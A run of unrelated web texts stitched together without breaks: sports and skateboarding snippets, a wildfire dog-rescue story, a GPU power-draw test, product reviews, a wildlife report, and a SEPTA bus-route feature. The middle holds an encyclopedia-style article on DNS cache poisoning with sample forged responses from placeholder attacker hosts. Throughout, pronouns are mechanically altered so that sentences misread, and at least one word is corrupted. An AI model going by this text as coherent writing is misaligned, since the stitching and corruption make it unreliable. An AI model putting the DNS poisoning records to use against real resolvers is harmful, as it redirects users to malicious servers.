Billy Marks: My HOUSE for sure. It dropped $200,000 six months after I bought it, and I got into a shitty loan too.
Duane Peters: Lots of waste. Lots of regrets at different times, yet, when all's said and done there is no waste and money ain't my god! Besides, everybody dies broke, so live it up!
Mike Mo Capaldi: Bought 200 scratch off lotto tickets one night with Buttery Ass Donovan. Made about $70 back. Stupid.
Roland Hendel heard the explosions.
"Propane tanks, twisting metal, and the hot swirling winds" that the nation has come to know as the "Diablo Winds" tore through their Sonoma County forest property and the family had to flee for their lives, they said.
The father was faced with a split-second decision: Take their family and two dogs to safety or forsake one dog and their eight "bottle-fed goats."
Hendel had to leave behind Odin, a Great Pyrenees, and the goats as they and their family along with Odin's sister Tessa jumped into the car and sped off.
They and their family were certain Odin and the goats were gone, they said.
"Hours later when we had found relative safety we cried for Odin and our goats," Hendel wrote on the family's YouCaring crowdfunding page. "I was sure I had sentenced them to a horrific and agonizing death."
Towering flames prompt more evacuations in Northern California as wildfires kill 40
Apocalyptic views from above the deadly California wildfires
Man finds their mother's body at their wildfire-destroyed California home
The blazes that destroyed the Hendel home are among the deadliest in the state's history, having charred more than 214,000 acres, forced about 100,000 residents to evacuate and damaged or destroyed at least 5,700 homes and businesses, according to the California Department of Forestry and Fire Protection.
Incredibly, days later when it was safe for the Hendels to return to the barbequed home, they managed to find "a burned, battered, and weakened Odin surrounded by their eight goats," Hendel wrote, underneath a large closeup photograph of the exhausted dog's snout and white coat stained smoke gray.
And not only that, but Odin somehow protected the lives of several deer "who had come to them for protection and safety," they wrote on the YouCaring page.
The moment when Odin was reunited with their sister Tessa apparently restored the valorous canine's pluck.
"He appears to be getting stronger, and their sister's presence will surely help to lift their spirits and take some of the burden off their giant shoulders," Hendel said.
Despite the immaculate news of Odin's heroics, and both wild and domesticated life preserved, the family's pumphouse was destroyed, Hendel wrote, which was their access to fresh water. All of the family's structures "were decimated, including the barn we had lovingly rebuilt for them earlier this year."
Ominously, Hendel noted, "winter is coming."
The family is picking up the pieces and reaching out so that Odin, Tessa, and the goats can have a rebuilt barn "before the winter" so that Odin's “bravery and sacrifice are not in vain.”
The San Jose Earthquakes conclude their preseason schedule this Saturday with a match against Sacramento Republic FC at Avaya Stadium, one week before opening their 2017 MLS regular season campaign against the Montreal Impact. Kick-off against the Quakes former USL affiliate is scheduled to kick off at 2:00 p.m., and attendance is free for season ticket holders. The game will be live streamed here.
San Jose has faced Sacramento at Avaya before — as part of the 2015 Lamar Hunt U.S. Open Cup — and the two teams have developed quite a rivalry since the Republic started play in 2014. The preseason friendly should in some ways serve as a dress rehearsal for next Saturday, though the chances that the starting line-up stays the same from one match to the next is likely remote.
“It could be. It depends on what happens,” said head coach Dominic Kinnear. “We could throw out some guys that end up not being available for the following weekend, so it may make it moot. You always have that idea in mind that this game could feature the team you are looking at to start the season from the get-go, but you still have to remain optimistic and open-minded to possible changes.”
Part of Kinnear's hesitation in laying out their plans ahead of next week's regular season opener is that only this week are all of the Earthquakes off-season signings finally present at the same time. Since early January, the Quakes have signed five international players — Harold Cummings, Marco Urena, Danny Hoesen, Florian Jungwirth, and Jahmir Hyka — but getting them together to train and build chemistry has been a challenge due to securing work visas. That has all been sorted out, and Kinnear couldn't be more relieved.
“We haven't had the entire squad together yet. Not all in one place,” said Kinnear. “This weekend will mark the first time we've had the team together as a whole. You'd love to have it happen earlier, but we are happy it's happening.”
Hyka made their Quakes debut earlier this week and was very impressive as an attacking midfielder. Jungwirth re-arrived today and already is a front-runner to play on the defensive line this weekend and next. Hoesen and Urena will compete to play forward, while Cummings is still a week away from full training following a surgical procedure earlier this month. Throw in current Designated Players Chris Wondolowski and Simon Dawkins, and the team looks quite formidable heading into the 2017 MLS season.
“We are looking really good,” said Dawkins to Center Line Soccer. “The new signings look very sharp, both at forward and in defense. They look really good. They are really experienced as well and they can help us as we start the season.”
The Earthquakes opponent this weekend is also in their preseason, as the Republic gears up for its USL season opener next month. The Division Two competitors is not one to take lightly, especially as they will want to measure up against a Division One MLS foe. San Jose's only loss of the preseason so far was to local NASL side San Francisco Deltas.
“Those NASL and USL teams are always tricky because you know what you are going to get from them,” explained Kinnear. “You have to make sure the mentality of your team is to act first because you know what mentality the other team will bring.”
And while the match will only count for Nor-Cal bragging rights — The Hella Cup, as some supporters like to call it — it does provide the Earthquakes a valuable opportunity to tune up their squad and elevate the level of their play ahead of the match against Montreal. Kinnear has shared that message with the team all week, and they are expecting a solid performance from everyone on the field.
“The one thing you have to be mindful of is getting guys healthy, getting guys fit,” said Kinnear, “and then getting them in the right frame of mind to attack the season.”
GAME NOTES:
In the comments to our recent review of the ASUS ROG Swift PG279Q G-Sync monitor, a commenter by the name of Cyclops pointed me in the direction of an interesting quirk that I hadn't considered before. According to reports, the higher refresh rates of some panels, including the 165Hz option available on this new monitor, can cause power draw to increase by as much as 100 watts on the system itself. While I did say in the review that the larger power brick ASUS provided with it (compared to last year's PG278Q model) pointed toward higher power requirements for the display itself, I never thought to measure the system.
To setup a quick test I brought the ASUS ROG Swift PG279Q back to its rightful home in front of our graphics test bed, connected an EVGA GeForce GTX 980 Ti (with GPU driver 358.50) and chained both the PC and the monitor up to separate power monitoring devices. While sitting at a Windows 8.1 desktop I cycled the monitor through different refresh rate options and then recorded the power draw from both meters after 60-90 seconds of time to idle out.
The results are much more interesting than I expected! At 60Hz refresh rate, the monitor was drawing just 22.1 watts while the entire testing system was idling at 73.7 watts. (Note: the display was set to its post-calibration brightness of just 31.) Moving up to 100Hz and 120Hz saw very minor increases in power consumption from both the system and monitor.
But the jump to 144Hz is much more dramatic – idle system power jumps from 76 watts to almost 134 watts – an increase of 57 watts! Monitor power only increased by 1 watt at that transition though. At 165Hz we see another small increase, bringing the system power up to 137.8 watts.
Interestingly we did find that the system would repeatedly jump to as much as 200+ watts of idle power draw for 30 seconds at time and then drop back down to the 135-140 watt area for a few minutes. It was repeatable and very measurable.
So, what the hell is going on? A look at GPU-Z clock speeds reveals the source of the power consumption increase.
When running the monitor at 60Hz, 100Hz and even 120Hz, the GPU clock speed sits comfortably at 135MHz. When we increase from 120Hz to 144Hz though, the GPU clock spikes to 885MHz and stays there, even at the Windows desktop. According to GPU-Z the GPU is running at approximately 30% of the maximum TDP.
Though details are sparse, it seems pretty obvious what is going on here. The pixel clock and the GPU clock are connected through the same domain and are not asynchronous. The GPU needs to maintain a certain pixel clock in order to support the required bandwidth of a particular refresh rate, and based on our testing, the idle clock speed of 135MHz doesn't give the pixel clock enough throughput to power anything more than a 120Hz refresh rate.
Pushing refresh rates of 144Hz and higher causes a surprsing increase in power draw
The obvious question here though is why NVIDIA would need to go all the way up to 885MHz in order to support the jump from 120Hz to 144Hz refresh rates. It seems quite extreme and the increased power draw is significant, causing the fans on the EVGA GTX 980 Ti to spin up even while sitting idle at the Windows desktop. NVIDIA is aware of the complication, though it appears that a fix won't really be in order until an architectural shift is made down the road. With the ability to redesign the clock domains available to them, NVIDIA could design the pixel and GPU clock to be completely asynchronous, increasing one without affecting the other. It's not a simple process though, especially in a processor this complex. We have seen Intel and AMD correctly and effectively separate clocks in recent years on newer CPU designs.
What happens to a modern AMD GPU like the R9 Fury with a similar test? To find out we connected our same GPU test bed to the ASUS MG279Q, a FreeSync enabled monitor capable of 144 Hz refresh rates, and swapped the GTX 980 Ti for an ASUS R9 Fury STRIX.
The AMD Fury does not demonstrate the same phenomenon that the GTX 980 Ti does when running at high refresh rates. The Fiji GPU runs at the same static 300MHz clock rate at 60Hz, 120Hz and 144Hz and the power draw on the system only inches up by 2 watts or so. I wasn't able to test 165Hz refresh rates on the AMD setup so it is possible that at that threshold the AMD graphics card would behave differently. It's also true that the NVIDIA Maxwell GPU is running at less than half the clock rate of AMD Fiji in this idle state, and that may account for difference in pixel clocks we are seeing. Still, the NVIDIA platform draws slightly more power at idle than the AMD platform, so advantage AMD here.
For today, know that if you choose to use a 144Hz or even a 165Hz refresh rate on your NVIDIA GeForce GPU you are going to be drawing a bit more power and will be less efficient than expected even just sitting in Windows. I would bet that most gamers willing to buy high-end display hardware capable of those speeds won't be overly concerned with 50-60 watts of additional power draw, but it's an interesting data point for us to track going forward and to compare AMD and NVIDIA hardware in the future.
Nov 13th, 2017
Nov 13th, 2017
Disgruntled Holmes could leave Sharks
Valentine Holmes may consider asking for a release from their Cronulla contract if they are shifted from their favourite fullback position next season.
The Sharks have signed two big-money utility backs who can both play fullback next season - Josh Dugan and Matt Moylan.
And despite the fact they starred for Australia against Lebanon at fullback the other night, Holmes may find themselves back on the wing, where they have played much of their football in their career at the Sharks, next season.
Cronulla's Valentine Holmes could leave the club if they are forced to switch from fullback to accommodate Josh Dugan or Matt Moylan. (AAP)
If Mitchell Pearce joins the Sharks, that will increase the odds of Holmes playing on the wing, with Moylan likely to play fullback and Pearce and Chad Townsend in the halves.
Holmes has told those close to them they will consider requesting a release if they are moved back onto the wing, which they consider a backward step in their career.
If they do, watch several clubs, headed by the Tigers, make a play for the Sharks' glamour boy.
Warriors say good riddance to Foran
Kieran Foran only stayed one season at the Warriors, but they left a lasting legacy - of sorts.
"He is the most difficult, rude and disagreeable person I've ever dealt with," a veteran Warriors official told me.
The Warriors have not shed too many tears over the loss of Kieran Foran to the Bulldogs. (AAP)
"He won't be missed by anyone at the club - good riddance."
After a disappointing return to football at the Warriors in 2017, Foran will be looking to regain their best form at the Bulldogs next season.
Club hid star signing's secret
Last week we saw a spat between the Broncos and the Sharks, with Wayne Bennett fuming that Cronulla allegedly failed to disclose the extent of star signing Jack Bird's shoulder injury.
I can only imagine what will happen soon when one club discovers a far more serious secret with a glamour signing for 2018.
The player was let go by their club because of their love of coke - and not the sort you drink out of a can.
The club kept the star's 'habit' a closely guarded secret and when their new employers find out, sparks are certain to fly.
Clubs chomping at the bit for England flyer
England's blockbusting winger Jermaine McGillvary hasn't just caught the eye of NRL clubs - a Super League outfit is considering making a play for the man accused of biting Robbie Farah.
Cashed-up Warrington have the Huddersfield flyer on their radar for 2018.
England winger Jermaine McGillvary is being chased by clubs on both sides of the globe
New coach Steve Price has confirmed they want a new winger - and McGillvary - one of the stars of the World Cup - fits the bill.
Player manager suffers shocking injury
Well known player manager David Riolo thought their days of pain were over when they hung up their boots after a fine career with the Steelers and Eels in the 1980s.
But Riolo was rushed to hospital last week after suffering a shocking compound fracture of the wrist in an over 40s Oztag game at Coffs Harbour.
The injury required surgery but Riolo has still set their sights on the Australian team for the Over 40s World Cup next year alongside another former '90s star, ex-Wests and Illawarra halfback Josh White.
Gnarbox/Youtube The delay between jumping out of an airplane with a GoPro strapped to your head and the ensuing video of it being posted to Facebook is entirely too long.
That lag is a big complaint of GoPro lovers and other extreme sports photo shooters, according to Tim Feess, the CEO of Santa Monica-based Gnarbox.
Instead of lugging around a laptop, external hard drives, and running complicated editing software, their company created an extremely versatile device that jams all these functions into your pocket.
"It's the smallest, most convenient, the fastest editing tool, and most badass computer on the planet," Feess said at an event sponsored by Make in LA.
Feess was on hand at the hardware startup-focused event in downtown Los Angeles on Wednesday, speaking about the latest plans for production and explaining Gnarbox, which they said would "unlock hours of footage."
While it looks just like a mini external hard drive (which it is, with 128gb of storage), it's also a computer, WiFi hotspot, and card reader, which turns a smartphone into a video editing suite capable of splicing and enhancing 4K high definition video on the spot. This means everything from trimming, making adjustments to color or brightness, or picking out certain moments for slow-motion.
The device is a huge time saver for extreme sports junkies (or anyone who shoots video on the go, really). They may shoot hours of footage but just barely scratch the surface when it comes to throwing together a cool video to share with friends.
For example, a snowboarder wearing a GoPro might wait until the end of the day, running through hours of footage far from the slopes. With a Gnarbox, that same snowboarder can get video of a few tricks and turns, then sit down on the slopes, edit that footage on their phone, and upload it to YouTube in less than five minutes.
Flickr/Trysil
Feess is a fan of GoPro cameras, which they called "fantastic pieces of equipment." But they seem to have found a niche gap in the market, which has turned out to be a profitable one (Feess previously told Bloomberg that Gnarbox has had talks with GoPro about some kind of partnership).
Last year, the device raised nearly $100,000 on Kickstarter in just 24 hours (culminating in a whopping $540,000 over the month). Now, the company is getting the final product ready to ship, which should happen sometime in the next few months.
Check out the Gnarbox demo video:
(Newser) – Those suffering from musophobia would be wise to steer clear of the South Farallon Islands. The archipelago, which sits just 27 miles off San Francisco, is the most rodent-dense island in the world, with an average of 500 Eurasian house mice occupying each of its 120 acres (that's 60,000 total). The only humans who have to deal with them are the scientists studying the otherwise uninhabited island's unique ecosystem—and things have gotten so bad that they say the ground often seems to be moving, and other species are being threatened. On Friday, the Fish & Wildlife Service released a 650-page report that sums up its review of the 49 methods suggested for getting rid of the creatures, which are believed to have made their way to the islands via 19th-century seal-hunting vessels. It determined there are only two options: One, douse the island with rodenticides. Two, do nothing.
Though other ideas included carting in feral cats, trapping, and sterilization, the Fish & Wildlife Service says that any method other than poison—which would entail food pellets treated with one of two anticoagulants being dropped on the island, ultimately causing the mice to bleed to death—would have too great an effect on the ecosystem. But the effort wouldn't be as simple as just dropping and waiting, explains the SF Chronicle: peregrine falcons and burrowing owls would have to be captured and held elsewhere; methods would have to be put in place to deter seagulls. And while mice have been wiped from more than 50 islands around the globe using rodenticides, animal rights groups are staunchly opposed, and note that in the asupervisorstioned cases, other species also perished; KTVU also notes that products made with one of the poisons under consideration were banned from sale this year by the EPA because they are so toxic to animals. But biologists say that even with those casualties, the ecosystems have bounced back. A decision is expected by year-end. (Click for a more disturbing story involving tens of thousands of rodents.)
Here's the deal, I went through a million other speaker reviews till I ended up on this speaker, with zero reviews. But that meant I wasn't reading a review that was bought with cheap or free items. I trusted the name, and I took the risk. Here are my thoughts: Sound: If you are worried about bass, this has it. I played Love Lockdown, and it kicks. I mean, it KICKS. It has some serious bass on this thing. It was super surprising to me how hard it kicked, like Pele in the Euro Cup hard. However, it lacks a little with the highs, but it is still able to get there, just not as well as the bass. I imagine it is perfect if you only want to use it for R&B style music, but it is still fantastic for everything else. It is loud. Even with the treble. It'll get some attention, but you aren't using it as your speaker at the next party you DJ. Size: It isn't exactly pocket sized, but it is not throw it on your shoulder big either. It is light-ish, and is super easy for me to take places, and for that, I let it keep it's 5 star, because it is small enough to carry around, and be portable, but not small enough to where it feels weak. I don't know, it's preference, and mine is in a little bit beefier of a speaker. You don't need a gym membership to lift it, but you need to be a little bit stronger than SpongeBob with their stuffed animal weights. It's like maybe 2-3 pounds. It probably says it, so just go use that if you really care still. Style: I mean, it's Black, and a speaker. I don't know, I guess it is cool looking. I haven't exactly really cared about style, but it looks good, and with the rubber, it feels pretty cool too. Whatever, look at the picture, it is exactly what it looks like. This section is just so I cover all the bases of this speaker. Oh, wait! Snap, I forgot, it has a little blue LED on it, when it is connected, and it flashes when it is trying to connect. I like it. It isn't blinding, but it makes it just a little bit cooler. Great little detail about it. If you care, ask for a picture, but as I said, the picture on Amazon is literally it. Buttons and Everything Else: Alright, I read some reviews on other speakers where people complained about the speaker making a loud noise when turned on and off, and pressing the volume buttons. This one does that. But it isn't blaring loud. I kinda like it, it is pleasant. But hey, if you want a stealth speaker for some crazy reason, know that this one doesn't have it's black belt yet. Oh, and the Bluetooth connect makes a noise, so, note that. The power bank is nice, it does its job, and is a bonus because I didn't even read that it did that, so, win for me I guess. Oh, and the aux port is convenient, because I can use it with my laptop too. Pros: Bass Charging Bank Style (I guess) Clear sound Cons: None Go for it, it's pretty legit.
Read more
DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt Domain Name System data is introduced into the DNS resolver's cache, causing the name server to return an incorrect result record, e.g. an IP address. This results in traffic being diverted to the attacker's computer (or any other computer).
Overview of the domain name system [ edit ]
A domain name system server translates a human-readable domain name (such as example.com ) into a numerical IP address that is used to route communications between nodes. Normally if the server does not know a requested translation it will ask another server, and the process continues recursively. To increase performance, a server will typically remember (cache) these translations for a certain amount of time. This means if it receives another request for the same translation, it can reply without needing to ask any other servers, until that cache expires.
When a DNS server has received a false translation and caches it for performance optimization, it is considered poisoned, and it supplies the false data to clients. If a DNS server is poisoned, it may return an incorrect IP address, diverting traffic to another computer (often an attacker's).[1]
Cache poisoning attacks [ edit ]
Normally, a networked computer uses a DNS server provided by an Internet service provider (ISP) or the computer user's organization. DNS servers are used in an organization's network to improve resolution response performance by caching previously obtained query results. Poisoning attacks on a single DNS server can affect the users serviced directly by the compromised server or those serviced indirectly by its downstream server(s) if applicable.[citation needed]
To perform a cache poisoning attack, the attacker exploits flaws in the DNS software. A server should correctly validate DNS responses to ensure that they are from an authoritative source (for example by using DNSSEC); otherwise the server might end up caching the incorrect entries locally and serve them to other users that make the same request.
This attack can be used to redirect users from a website to another site of the attacker's choosing. For example, an attacker spoofs the IP address DNS entries for a target website on a given DNS server and replaces them with the IP address of a server under their control. The attacker then creates files on the server under their control with names matching those on the target server. These files usually contain malicious content, such as computer worms or viruses. A user whose computer has referenced the poisoned DNS server gets tricked into accepting content coming from a non-authentic server and unknowingly downloads the malicious content. This technique can also be used for phishing attacks, where a fake version of a genuine website is created to gather personal details such as bank and credit/debit card details.
Variants [ edit ]
In the following variants, the entries for the server ns.target.example would be poisoned and redirected to the attacker's name server at IP address w.x.y.z . These attacks assume that the name server for target.example is ns.target.example .[citation needed]
To accomplish the attacks, the attacker must force the target DNS server to make a request for a domain controlled by one of the attacker's nameservers.[citation needed]
Redirect the target domain's name server [ edit ]
The first variant of DNS cache poisoning involves redirecting the name server of the attacker's domain to the name server of the target domain, then assigning that name server an IP address specified by the attacker.
DNS server's request: what are the address records for subdomain.attacker.example ?
subdomain.attacker.example. IN A
Attacker's response:
Answer: (no response) Authority section: attacker.example. 3600 IN NS ns.target.example. Additional section: ns.target.example. IN A w.x.y.z
A vulnerable server would cache the additional A-record (IP address) for ns.target.example , allowing the attacker to resolve queries to the entire target.example domain.
Redirect the NS record to another target domain [ edit ]
The second variant of DNS cache poisoning involves redirecting the nameserver of another domain unrelated to the original request to an IP address specified by the attacker.[citation needed]
DNS server's request: what are the address records for subdomain.attacker.example ?
subdomain.attacker.example. IN A
Attacker's response:
Answer: (no response) Authority section: target.example. 3600 IN NS ns.attacker.example. Additional section: ns.attacker.example. IN A w.x.y.z
A vulnerable server would cache the unrelated authority information for target.example 's NS-record (nameserver entry), allowing the attacker to resolve queries to the entire target.example domain.
Prevention and mitigation [ edit ]
Many cache poisoning attacks against DNS servers can be prevented by being less trusting of the information passed to them by other DNS servers, and ignoring any DNS records passed back which are not directly relevant to the query. For example, versions of BIND 9.5.0-P1[2] and above perform these checks.[3] Source port randomization for DNS requests, combined with the use of cryptographically secure random numbers for selecting both the source port and the 16-bit cryptographic nonce, can greatly reduce the probability of successful DNS race attacks.
However, when routers, firewalls, proxies, and other gateway devices perform network address translation (NAT), or more specifically, port address translation (PAT), they may rewrite source ports in order to track connection state. When modifying source ports, PAT devices may remove source port randomness implemented by nameservers and stub resolvers.[citation needed]
Secure DNS (DNSSEC) uses cryptographic digital signatures signed with a trusted public key certificate to determine the authenticity of data. DNSSEC can counter cache poisoning attacks, but as of 2008 was not yet widely deployed. In 2010 DNSSEC was implemented in the Internet root zone servers.[4]
This kind of attack can be mitigated at the transport layer or application layer by performing end-to-end validation once a connection is established. A common example of this is the use of Transport Layer Security and digital signatures. For example, by using HTTPS (the secure version of HTTP), users may check whether the server's digital certificate is valid and belongs to a website's expected owner. Similarly, the secure shell remote login program checks digital certificates at endpoints (if known) before proceeding with the session. For applications that download updates automatically, the application can embed a copy of the signing certificate locally and validate the signature stored in the software update against the embedded certificate.[citation needed]
See also [ edit ]
Toads may be able to detect imminent earthquakes, according to scientists. The finding will add to the accounts through the centuries where animals, from dogs to rats, snake and chickens, are said to have behaved strangely before an earthquake.
In the study published today in the Journal of Zoology, a colony of toads deserted their mating site three days before an earthquake struck L'Aquila in Italy last year – the epicentre was 74km from the area where the animals had normally gathered. No toads returned to the site until 10 days later, after the last of the significant aftershocks had finished.
The discovery was made by accident by Rachel Grant, a life scientist at the Open University. They were studying the effects of lunar cycles on the toads' behaviour and reproduction. "I was going out every evening at dusk and counting how many toads were active and how many pairs there were. Normally they arrive for breeding in early March and you get large numbers of males at the breeding site. The females get paired fairly quickly. They stay active and obvious around the breeding site until the spawning is over in April or May."
One day they noticed there were no toads. "Sometimes during the breeding season you get a drop in numbers if there's been a very cold night but usually, the day after, they come back again. It was very unusual that there was none at all."
There could be several mechanisms for animals to sense the beginnings of an earthquake, wrote Grant in the Journal of Zoology. They could detect seismic waves directly or ground tilt (which can occur in the minutes before a quake). In addition there might be anomalies in the Earth's magnetic field.
Looking for clues to explain the toads' behaviour, Grant found that scientists had noticed disruptions in the ionosphere, the uppermost electromagnetic layer of the earth's atmosphere, at the time of the L'Aquila earthquake, which the toads may have detected. Previous earthquakes have had similar ionospheric disruptions associated with them. "I've spoken to seismologists who said there were a lot of gases released before the earthquake, a lot of charged particles. Toads and amphibians are very sensitive to changes in environmental chemistry and I think these gases and charged particles could have been detected by the toads."
Previously, fish, rodents and snakes have been anecdotally associated with unusual behaviour more than a week before an earthquake or at distances greater than 50km.
In 2003, Japanese doctor Kiyoshi Shimamura found that there was a jump in dog bites and other dog-related complaints before and after earthquakes. Before the 1995 earthquake in Kobe, a disaster that killed more than 6,000 people, they found that accounts of dogs barking "excessively" went up by 18% on average in the months before the earthquake. Above the epicentre on Awaji Island, there was a 60% increase in complaints compared with a year earlier.
Grant's work is not the first time toads have been associated with sensing the precursors of earthquakes. "In 2008, there was a big earthquake in Szechuan province in China and there was unusual migration of toads seen," they said. "I'd like to study it further and look at animal behaviour in combination with seismological and geophysical precursors."
Since three former Duke Lacrosse players were declared innocent of rape and assault charges, the alleged victim in the highly publicized Duke Lacrosse case has remained out of public view until now. In a press release, Crystal Mangum's manager has announced plans to release a tell-all memoir entitled "The Last Dance for Grace: The Crystal Mangum Story."
According to the book's co-author Vincent Clark, the book will be released in October.
"It is "the only definitive account of the life and struggles of the woman at the center of the Duke Lacrosse case, the alleged accuser," said Clark in a press release. " Were it not for the Duke Lacrosse Case, they likely would be described as a bright, young woman from Durham, North Carolina, who has had a difficult life."
Mangum plans to donate $1 from each book sold to help battered women.
Former Durham County District Attorney Mike Nifong was disbarred and jailed following the collapse of the Duke Lacrosse Case. Nifong is among several defendants named in at least three federal lawsuits stemming from the case.
Mangum is accused of falsely accusing David Evans, Collin Finnerty and Reade Seligmann of raping and beating them at a team party in March 2006. After a review by the State Attorney General's Office, all charges were dismissed.
I really really adore this photo of mycosplay from, so I wanted to share it on here with you all today! I cannot express how happy I was to complete one of my dream cosplays for AnimeNEXT 2015 last year. I'd wanted to cosplay as my cute little alien fish since the anime first came out in 2012, and I finally had to skills to make their cosplay last summer. I'm really happy with how they turned out, and I'm so proud of what I created with my own two hands. I hope that you all enjoy this lovely shot taken duringbyon Facebook! I have this and a few other shots from our shoot up on myin aif you'd like to check them out! I'm sososo happy I was able to cosplay from the fishing anime since it's one of my top fave series!If you'd like to keep up with my cosplaying, feel more than free to check out myThank you all so very much for your support!!~
ATTENTION! The content of this article is more than three months old and may not be relevant to the current version of the game
In 1.10 we introduce five new weather settings: Night Overcast, Dawn Foggy, Dawn Overcast, Dusk Foggy and Dusk Overcast.
This is a follow up on the light setting tweaks in 1.09 and completes the circle of possible weather settings giving a total of 12 different settings that combines the time of day for a battle with weather condition.
There are four different Time of Day settings: Night, Dawn, Day, Dusk. And three different Weather conditions: Slightly cloudy, Overcast, Foggy.
The five new weather settings
Night Overcast
Dawn Foggy
Dawn Overcast
Dusk Foggy
Dusk Overcast
The rest of the weather settings
Night Slightly cloudy
Night Foggy
Dawn Slightly cloudy
Day Slightly cloudy
Day Overcast
Day Foggy
Dusk Slightly cloudy
Hardly anyone rides SEPTA's Route 23 bus from its origin in the deepest South Philly, on Oregon Avenue, to its terminus at the top of Chestnut Hill. After all, it takes about 90 minutes from end-to-end, roughly as long as a trip to New York City.
“It goes through every type of neighborhood,” the driver says, as the bus idles on Broad Street, waiting to begin its long journey to Northwest Philadelphia.
RELATED STORY: SEPTA to split Route 23 bus route
That's the reason professors at Temple and the University of Pennsylvania have assigned their students to ride the 13.8-mile route as a means to familiarize themselves with the city. This academic exercise stretches back decades, to at least the 1960s, long before the line transitioned from trolley cars to buses in 1992, when the 23 was the longest streetcar line in the world.
No matter the vehicle, Route 23 wends its way through the densely-packed rowhomes of working class South Philly, the stately townhomes and office buildings of Center City, up through the heart of impoverished North Philly, historic but divested Germantown, the integrated middle-class neighborhood of West Mt. Airy, to the wealthy enclave of Chestnut Hill.
“The trolley and the 23 was an inspiration to me as I tried to make sense of Philadelphia,” says Elijah Anderson, left, professor of sociology at Yale, formerly at Penn, and author of "Code of the Street" and the "Cosmopolitan Canopy."
“It's a real tool for teaching, especially for students who are new to the city," they say."They get a feel for the diversity of the neighborhoods along the way. It's a perfect people-watching venue – the trolley basically allowed you to get close to the subject matter. There are few cities in the country with such a line.”
Route 23 is SEPTA's busiest surface route, with 254 weekday trips carrying an average of 22,801 passengers. Among City Transit lines, it lags only the Market-Frankford and Broad Street Lines in ridership. It is also one of the worst performers in terms of scheduled service: its on-time rate is a mere 64 percent. (Only five lines perform worse.)
Out the window of the Route 23 bus, at 11th and Jackson streets, as it heads north on its 13.8-mile trip from South Philadelphia to Chestnut Hill. (Thom Carroll / PhillyVoice)
Last month, SEPTA announced a plan to address these delays by dividing the 23 in two, with half of the route rechristened as the 45 – the stretch from Oregon Avenue to Center City to the Eraserhood – while the northern portion continues as the 23.
SEPTA representatives say they've heard no substantial opposition to the plan. Most passengers use the bus to travel between adjacent neighborhoods or to Center City, not to travel across it. The length of the route makes riders in Germantown susceptible to traffic incidents in the narrow streets of South Philly, or puts a rider trying to get from Temple University to downtown at the mercy of a car accident in Mt. Airy. SEPTA officials hope that the shorter routes will reduce gaps in service.
AN EDUCATION ON WHEELS
As SEPTA considers severing the 23, it is worth experiencing why Anderson and others like them have found the route such a useful teaching aid about Philadelphia and its neighborhoods.
Hopping on a waiting Route 23 bus at Broad and Oregon, the bus lumbers into the narrow streets of South Philadelphia. There are no vacant houses or storefronts, the corner bars and barber shops still anchor their blocks. The passengers are mostly white, with a few Hispanic and Asian riders, too.
Rita Ann of South Philadelphia rides the 23 every workday to Center City - and has for 15 years. They remember when trolleys still ran on the line. "It was a lot slower," they say, "but the windows would open, you could even smoke. It was nostalgic.” (Thom Carroll / PhillyVoice)
“I ride it uptown every day for work for the last 15 years,” says Rita Ann, a lifelong resident of South Philly. They say they have never ridden the 23 north beyond Center City, but distinctly recalls when trolleys ran along the route. “It was a lot slower, but the windows would open, you could even smoke. It was nostalgic.”
As the 23 approaches Market, the streets grow broader, and the bus is further away from the houses which grow taller and grander. The storefronts no longer cater to working-class tastes and the suit-and-tie crowd is evident. In Center City almost everyone gets off and the fresh crop of passengers wanting to head north is almost entirely African American.
Just north of Center City, the 23 begins to get much more crowded. (Thom Carroll / PhillyVoice)
After passing through Chinatown, and the former industrial district that used to be home to film director David Lynch, and the Hope VI-restored Richard Allen public housing neighborhood, the 23 skirts the eastern edge of Temple University's campus. It's right about here that the 23 bus picks up Germantown Avenue, the lengthy boulevard it will trace all the way to the city's edge.
The long-depressed blocks of North Philadelphia follow, the rows lined with boarded-up homes and vacant lots, and the abandoned hulks of long defunct factories. In these neighborhoods, the 23 gets crowded as it offers an arterial transit service far from the two subway lines.
A bustling crowd waits for the 23 at the intersection of Germantown Avenue, Erie Avenue and Broad Street. (Thom Carroll / PhillyVoice)
At the joining of Erie, Germantown, and Broad, a bustling North Philadelphia shopping district, there is another huge changeover in passengers. The Black and Nobel bookstore holds court on one side of the intersection — a stark confirmation that “We Ship To Prisons” on the side of the building in huge white on black lettering — while a Church's Chicken with an absurdly large sign holds down the other side.
Continuing up Germantown Avenue to the northwest, the looming Gothic Revival spires of Simon Gratz High School are clearly visible in the distance. There's even named a restaurant after historic line: the Route 23 Café.
'I LIKED THE TROLLEY BETTER'
At this point there are no open seats on the 23 as it rolls into the formerly upper middle class neighborhoods of old Germantown. Gorgeous houses and stately old buildings, many bearing historic preservation signage, line the avenue interspersed with hoagie shops and check cashing joints. Many restaurants cater to the devout local population of African American Muslims, including the now defunct Mecca Pizza. The Johnson House, site of Philly's only extant stop on the Underground Railroad; the Germantown White House, where George Washington escaped from the central city in what was then countryside; Germantown Friends, a Quaker K-12 school that dates back to 1845.
But many are vacant, like the old town hall, or in obvious disrepair, like Trinity Lutheran Church.
It is here that Margrete, who asked that their last name not be used, gets on. They live in Germantown but takes the 23 bus twice a week to visit friends in Chestnut Hill. They soberly discuss how often the bus is on time and the constricting press of the crowds of passengers. But they brighten at the mention of the old trolleys.
“When I lived in North Philly I used to take the trolley,” they remember, smiling. “That was years ago. They were green and beige and the fare was only 23 cents. I liked the trolley better, although it took longer.” (When trolleys rumbled along the 23, an end-to-end ride took more than three hours; the bus takes about half of that time.)
Restaurants, boutiques, banks and cobblestones line Germantown Avenue, a main thoroughfare that slices East and West Mount Airy in two. (Thom Carroll / PhillyVoice)
In Germantown the racial demographics begin to diversify and, soon, the 23 arrives in West Mt. Airy. This middle class neighborhood – one of the oldest integrated communities in America – has seen a storefront revitalization in recent years, as restaurants have begun sprouting on the once-listless main street. Then comes the terminus, Chestnut Hill, with its shops of olive oil, antiques and fine cheese.
One of the history professors who assigned students to ride the 23 route now lives in Chestnut Hill, near the end of the line.
“Other people in the Urban Studies department were doing this when I got to Temple in 1971,” says Arthur Schmidt, left, now retired from the history department.
“It was very useful because it gave students a chance to see the income and racial segregation that exists in the city," they said. "You can see it correlates a bit with the different sorts of housing styles and eras that things were built in. You can still see considerable evidence of the deterioration of the manufacturing.”
SEPTA representatives assert that the new divided route will not foreclose the possibility of returning the 23 to the trolleys that ran the route when Schmidt and Anderson were assigning it. But they do not seem to think it would be a practical choice.
And as nostalgic as some riders are for the old trolley cars, their attitudes may best be summed up by Nayla Akres, a rider from South Philly.
